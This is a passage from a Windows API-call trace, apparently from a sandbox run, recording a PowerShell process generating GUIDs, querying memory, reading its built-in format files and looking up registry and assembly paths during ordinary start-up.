RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.622] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x42172007, Data2=0x2afa, Data3=0x453a, Data4=([0]=0x80, [1]=0x83, [2]=0x55, [3]=0xa8, [4]=0xa2, [5]=0x0, [6]=0x97, [7]=0x14))) returned 0x0 [0029.622] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xdc7d74d7, Data2=0x5193, Data3=0x4051, Data4=([0]=0x9d, [1]=0xcd, [2]=0x2d, [3]=0xcc, [4]=0xa1, [5]=0x95, [6]=0x4c, [7]=0x85))) returned 0x0 [0029.622] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x8c44ffa1, Data2=0xbd36, Data3=0x475a, Data4=([0]=0xbf, [1]=0xf4, [2]=0x7e, [3]=0x80, [4]=0x1b, [5]=0xcd, [6]=0xea, [7]=0xf5))) returned 0x0 [0029.622] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb798bcb3, Data2=0xe454, Data3=0x4bd5, Data4=([0]=0xa4, [1]=0x2e, [2]=0x63, [3]=0x2a, [4]=0xf9, [5]=0x80, [6]=0x1f, [7]=0xe3))) returned 0x0 [0029.622] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xd4f49b1a, Data2=0x3944, Data3=0x4c94, Data4=([0]=0x8a, [1]=0x26, [2]=0xb2, [3]=0xe, [4]=0x78, [5]=0x45, [6]=0xb9, [7]=0x21))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x12a50cfb, Data2=0x2ec8, Data3=0x4c6c, Data4=([0]=0xbb, [1]=0xda, [2]=0x78, [3]=0x64, [4]=0xfe, [5]=0xbf, [6]=0xeb, [7]=0x45))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x8163cab3, Data2=0x72f, Data3=0x4c32, Data4=([0]=0x92, [1]=0x8c, [2]=0x73, [3]=0x43, [4]=0xbb, [5]=0x9e, [6]=0xee, [7]=0xfa))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xf74c3b7e, Data2=0x20c0, Data3=0x4984, Data4=([0]=0x88, [1]=0xbf, [2]=0xf3, [3]=0x69, [4]=0x94, [5]=0x61, [6]=0x48, [7]=0x48))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb7cca632, Data2=0x98c2, Data3=0x4290, Data4=([0]=0x89, [1]=0x29, [2]=0x37, [3]=0x87, [4]=0x82, [5]=0xf5, [6]=0x2d, [7]=0xe7))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xa7de4f49, Data2=0x4fce, Data3=0x4e02, Data4=([0]=0xb7, [1]=0xa4, [2]=0x4, [3]=0xf7, [4]=0x87, [5]=0x74, [6]=0xb4, [7]=0xda))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x38757c3d, Data2=0x7c11, Data3=0x48bf, Data4=([0]=0x8c, [1]=0x54, [2]=0x61, [3]=0x35, [4]=0x73, [5]=0xa7, [6]=0x6, [7]=0x34))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3962b391, Data2=0x3f20, Data3=0x4aa1, Data4=([0]=0x93, [1]=0x2a, [2]=0x83, [3]=0xc3, [4]=0xcd, [5]=0xf3, [6]=0xd, [7]=0xe5))) returned 0x0 [0029.623] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x9bd2ebdf, Data2=0x378e, Data3=0x43b9, Data4=([0]=0xab, [1]=0xd6, [2]=0xa1, [3]=0x91, [4]=0xaa, [5]=0x64, [6]=0xfb, [7]=0xa0))) returned 0x0 [0029.624] VirtualQuery (in: lpAddress=0x24d400, lpBuffer=0x24e400, dwLength=0x1c | out: lpBuffer=0x24e400*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.624] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x95c05817, Data2=0x4815, Data3=0x4953, Data4=([0]=0x80, [1]=0x8, [2]=0xf2, [3]=0xf2, [4]=0x85, [5]=0x75, [6]=0x27, [7]=0x7e))) returned 0x0 [0029.624] VirtualQuery (in: lpAddress=0x24d400, lpBuffer=0x24e400, dwLength=0x1c | out: lpBuffer=0x24e400*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.625] VirtualQuery (in: lpAddress=0x24d400, lpBuffer=0x24e400, dwLength=0x1c | out: lpBuffer=0x24e400*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.627] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x54fd5e1, Data2=0x247b, Data3=0x4f07, Data4=([0]=0xa0, [1]=0xb7, [2]=0x9d, [3]=0x91, [4]=0x43, [5]=0x11, [6]=0x38, [7]=0xeb))) returned 0x0 [0029.627] VirtualQuery (in: lpAddress=0x24d400, lpBuffer=0x24e400, dwLength=0x1c | out: lpBuffer=0x24e400*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.627] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x35da1804, Data2=0x5d1c, Data3=0x4a6e, Data4=([0]=0x99, [1]=0x29, [2]=0x5e, [3]=0xb7, [4]=0x7d, [5]=0xe8, [6]=0x2e, [7]=0x8d))) returned 0x0 [0029.627] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb39a70c2, Data2=0xf678, Data3=0x4b2e, Data4=([0]=0x8a, [1]=0x6c, [2]=0x8f, [3]=0x2d, [4]=0xd9, [5]=0xb0, [6]=0x7b, [7]=0x7f))) returned 0x0 [0029.627] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x4a44ca6d, Data2=0x6524, Data3=0x4ab6, Data4=([0]=0xb9, [1]=0x13, [2]=0x46, [3]=0x37, [4]=0x25, [5]=0xe, [6]=0x44, [7]=0xfe))) returned 0x0 [0029.627] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x3df062c3, Data2=0x4de6, Data3=0x4b1f, Data4=([0]=0xbb, [1]=0x3c, [2]=0x69, [3]=0xf7, [4]=0x2d, [5]=0x92, [6]=0xf5, [7]=0x7c))) returned 0x0 [0029.628] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x5e5f618c, Data2=0x2cc4, Data3=0x46f1, Data4=([0]=0x99, [1]=0x93, [2]=0xd0, [3]=0xf7, [4]=0xa5, [5]=0x9, [6]=0xfa, [7]=0x52))) returned 0x0 [0029.628] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xe5973319, Data2=0x850a, Data3=0x4910, Data4=([0]=0x96, [1]=0x97, [2]=0xb8, [3]=0x74, [4]=0xe8, [5]=0xea, [6]=0xa6, [7]=0x1))) returned 0x0 [0029.628] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xb3890966, Data2=0xd9a, Data3=0x431e, Data4=([0]=0xa8, [1]=0xc0, [2]=0xbe, [3]=0xc9, [4]=0xec, [5]=0x66, [6]=0xd1, [7]=0xce))) returned 0x0 [0029.628] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.628] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x9703b93d, Data2=0x2ef8, Data3=0x4ee7, Data4=([0]=0x86, [1]=0x1, [2]=0xa7, [3]=0x70, [4]=0xb6, [5]=0xd0, [6]=0x7, [7]=0x66))) returned 0x0 [0029.629] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x7695658, Data2=0xa769, Data3=0x4f6f, Data4=([0]=0x82, [1]=0xe6, [2]=0x97, [3]=0xff, [4]=0x7d, [5]=0x68, [6]=0x63, [7]=0x2a))) returned 0x0 [0029.629] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xca85026a, Data2=0xe83, Data3=0x4219, Data4=([0]=0x93, [1]=0x80, [2]=0x93, [3]=0xe6, [4]=0xee, [5]=0x7f, [6]=0xc4, [7]=0x73))) returned 0x0 [0029.629] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x61c7be91, Data2=0xdee5, Data3=0x4310, Data4=([0]=0xb6, [1]=0x3e, [2]=0xcc, [3]=0x58, [4]=0xc, [5]=0x48, [6]=0xf2, [7]=0x6e))) returned 0x0 [0029.629] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x19bb675c, Data2=0x930, Data3=0x420a, Data4=([0]=0xad, [1]=0xe4, [2]=0x84, [3]=0x37, [4]=0xa3, [5]=0xe6, [6]=0x5b, [7]=0x88))) returned 0x0 [0029.629] VirtualQuery (in: lpAddress=0x24d3e0, lpBuffer=0x24e3e0, dwLength=0x1c | out: lpBuffer=0x24e3e0*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.630] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xd87363b0, Data2=0x83df, Data3=0x4f85, Data4=([0]=0xb4, [1]=0x96, [2]=0x10, [3]=0x3f, [4]=0x5d, [5]=0x55, [6]=0x52, [7]=0x16))) returned 0x0 [0029.630] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xab941d46, Data2=0xd2e9, Data3=0x45c4, Data4=([0]=0x8f, [1]=0x65, [2]=0x1, [3]=0x3f, [4]=0x5, [5]=0xbe, [6]=0x2b, [7]=0x5c))) returned 0x0 [0029.630] VirtualQuery (in: lpAddress=0x24d408, lpBuffer=0x24e408, dwLength=0x1c | out: lpBuffer=0x24e408*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.630] VirtualQuery (in: lpAddress=0x24d408, lpBuffer=0x24e408, dwLength=0x1c | out: lpBuffer=0x24e408*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.630] VirtualQuery (in: lpAddress=0x24d408, lpBuffer=0x24e408, dwLength=0x1c | out: lpBuffer=0x24e408*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.630] VirtualQuery (in: lpAddress=0x24d408, lpBuffer=0x24e408, dwLength=0x1c | out: lpBuffer=0x24e408*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0029.630] GetLastError () returned 0x0 [0029.631] SetErrorMode (uMode=0x1) returned 0x1 [0029.631] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.631] GetLastError () returned 0x0 [0029.631] GetFileType (hFile=0x300) returned 0x1 [0029.631] SetErrorMode (uMode=0x1) returned 0x1 [0029.631] GetFileType (hFile=0x300) returned 0x1 [0029.631] ReadFile (in: hFile=0x300, lpBuffer=0x2950d94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2950d94*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.633] GetLastError () returned 0x0 [0029.633] ReadFile (in: hFile=0x300, lpBuffer=0x2950d94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2950d94*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.633] GetLastError () returned 0x0 [0029.633] ReadFile (in: hFile=0x300, lpBuffer=0x2950d94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2950d94*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.633] GetLastError () returned 0x0 [0029.634] ReadFile (in: hFile=0x300, lpBuffer=0x2950d94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2950d94*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.634] GetLastError () returned 0x0 [0029.634] ReadFile (in: hFile=0x300, lpBuffer=0x2950d94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2950d94*, lpNumberOfBytesRead=0x24e6b4*=0x8b4, lpOverlapped=0x0) returned 1 [0029.634] GetLastError () returned 0x0 [0029.634] ReadFile (in: hFile=0x300, lpBuffer=0x29501e8, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x29501e8*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.634] GetLastError () returned 0x0 [0029.634] ReadFile (in: hFile=0x300, lpBuffer=0x2950d94, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2950d94*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.634] GetLastError () returned 0x0 [0029.634] CloseHandle (hObject=0x300) returned 1 [0029.635] GetLastError () returned 0x0 [0029.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0029.635] GetLastError () returned 0x0 [0029.635] SetErrorMode (uMode=0x1) returned 0x1 [0029.635] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x2971d90 | out: lpFileInformation=0x2971d90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1a87f7, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1a87f7, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd36b30fc, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1 [0029.635] GetLastError () returned 0x0 [0029.635] SetErrorMode (uMode=0x1) returned 0x1 [0029.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0029.635] GetLastError () returned 0x0 [0029.635] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.635] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.635] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.635] RegCloseKey (hKey=0x300) returned 0x0 [0029.635] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0029.635] GetLastError () returned 0x0 [0029.636] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48 [0029.636] GetLastError () returned 0x0 [0029.636] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x26e139f5, Data2=0xbbb6, Data3=0x4fea, Data4=([0]=0xa3, [1]=0x4d, [2]=0x6c, [3]=0x37, [4]=0x4c, [5]=0x56, [6]=0x11, [7]=0xae))) returned 0x0 [0029.636] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x10283873, Data2=0xc9fd, Data3=0x41d6, Data4=([0]=0x83, [1]=0x25, [2]=0xaa, [3]=0xef, [4]=0x82, [5]=0x9f, [6]=0x93, [7]=0x9a))) returned 0x0 [0029.637] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e14c, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0029.637] GetLastError () returned 0x0 [0029.637] SetErrorMode (uMode=0x1) returned 0x1 [0029.637] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x300 [0029.637] GetLastError () returned 0x0 [0029.637] GetFileType (hFile=0x300) returned 0x1 [0029.637] SetErrorMode (uMode=0x1) returned 0x1 [0029.637] GetFileType (hFile=0x300) returned 0x1 [0029.637] ReadFile (in: hFile=0x300, lpBuffer=0x2987ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2987ca0*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.638] GetLastError () returned 0x0 [0029.639] ReadFile (in: hFile=0x300, lpBuffer=0x2987ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2987ca0*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.639] GetLastError () returned 0x0 [0029.640] ReadFile (in: hFile=0x300, lpBuffer=0x2987ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2987ca0*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.640] GetLastError () returned 0x0 [0029.640] ReadFile (in: hFile=0x300, lpBuffer=0x2987ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2987ca0*, lpNumberOfBytesRead=0x24e6b4*=0x1000, lpOverlapped=0x0) returned 1 [0029.640] GetLastError () returned 0x0 [0029.640] ReadFile (in: hFile=0x300, lpBuffer=0x2987ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2987ca0*, lpNumberOfBytesRead=0x24e6b4*=0xe98, lpOverlapped=0x0) returned 1 [0029.640] GetLastError () returned 0x0 [0029.640] ReadFile (in: hFile=0x300, lpBuffer=0x29872d8, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x29872d8*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.640] GetLastError () returned 0x0 [0029.640] ReadFile (in: hFile=0x300, lpBuffer=0x2987ca0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x24e6b4, lpOverlapped=0x0 | out: lpBuffer=0x2987ca0*, lpNumberOfBytesRead=0x24e6b4*=0x0, lpOverlapped=0x0) returned 1 [0029.641] GetLastError () returned 0x0 [0029.641] CloseHandle (hObject=0x300) returned 1 [0029.641] GetLastError () returned 0x0 [0029.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e214, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0029.641] GetLastError () returned 0x0 [0029.641] SetErrorMode (uMode=0x1) returned 0x1 [0029.641] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x29a8c9c | out: lpFileInformation=0x29a8c9c*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1ce956, ftCreationTime.dwHighDateTime=0x1ca03f9, ftLastAccessTime.dwLowDateTime=0x5a1ce956, ftLastAccessTime.dwHighDateTime=0x1ca03f9, ftLastWriteTime.dwLowDateTime=0xd372551c, ftLastWriteTime.dwHighDateTime=0x1c9ea11, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1 [0029.641] GetLastError () returned 0x0 [0029.641] SetErrorMode (uMode=0x1) returned 0x1 [0029.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0029.641] GetLastError () returned 0x0 [0029.641] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x24e638 | out: phkResult=0x24e638*=0x300) returned 0x0 [0029.641] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0x0, lpcbData=0x24e67c*=0x0 | out: lpType=0x24e680*=0x1, lpData=0x0, lpcbData=0x24e67c*=0x56) returned 0x0 [0029.641] RegQueryValueExW (in: hKey=0x300, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x24e680, lpData=0xd2630, lpcbData=0x24e67c*=0x56 | out: lpType=0x24e680*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x24e67c*=0x56) returned 0x0 [0029.641] RegCloseKey (hKey=0x300) returned 0x0 [0029.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e1e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0029.641] GetLastError () returned 0x0 [0029.641] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0x24e174, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41 [0029.641] GetLastError () returned 0x0 [0029.642] VirtualQuery (in: lpAddress=0x24d390, lpBuffer=0x24e390, dwLength=0x1c | out: lpBuffer=0x24e390*(BaseAddress=0x24d000, AllocationBase=0x210000, AllocationProtect=0x4, RegionSize=0x3000, State=0x1000, Protect=0x4, Type=0x20000)) returned 0x1c [0029.642] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0x15554af7, Data2=0xa599, Data3=0x4c99, Data4=([0]=0x99, [1]=0xd7, [2]=0xe2, [3]=0x50, [4]=0xff, [5]=0x24, [6]=0xb2, [7]=0x76))) returned 0x0 [0029.643] CoCreateGuid (in: pguid=0x24e6a8 | out: pguid=0x24e6a8*(Data1=0xfcf143cc, Data2=0x710c, Data3=0x4741, Data4=([0]=0xb1, [1]=0xe8, [2]=0x4d, [3]=0x14, [4]=0x89, [5]=0x4f, [6]=0x9a, [7]=0xf0))) returned 0x0 [0029.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0029.659] GetLastError () returned 0x57 [0029.659] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e [0029.659] GetLastError () returned 0x57 [0029.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0029.667] GetLastError () returned 0x57 [0029.667] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70 [0029.667] GetLastError () returned 0x57 [0029.668] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x24e380, lpFilePart=0x0 | out: 